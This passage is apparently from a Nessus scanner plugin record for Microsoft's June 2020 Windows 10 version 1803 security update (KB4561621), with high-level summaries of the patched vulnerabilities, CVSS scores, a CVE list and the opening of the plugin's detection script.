CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows Feedback Hub improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302, CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings. An attacker who successfully exploited this vulnerability could replace the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561621: Windows 10 Version 1803 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1199", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1274", "CVE-2020-1276", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561621.NASL", "href": "https://www.tenable.com/plugins/nessus/137259", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137259);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1274\",\n \"CVE-2020-1276\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561621\");\n script_xref(name:\"MSFT\", value:\"MS20-4561621\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561621: Windows 10 Version 1803 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561621.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n 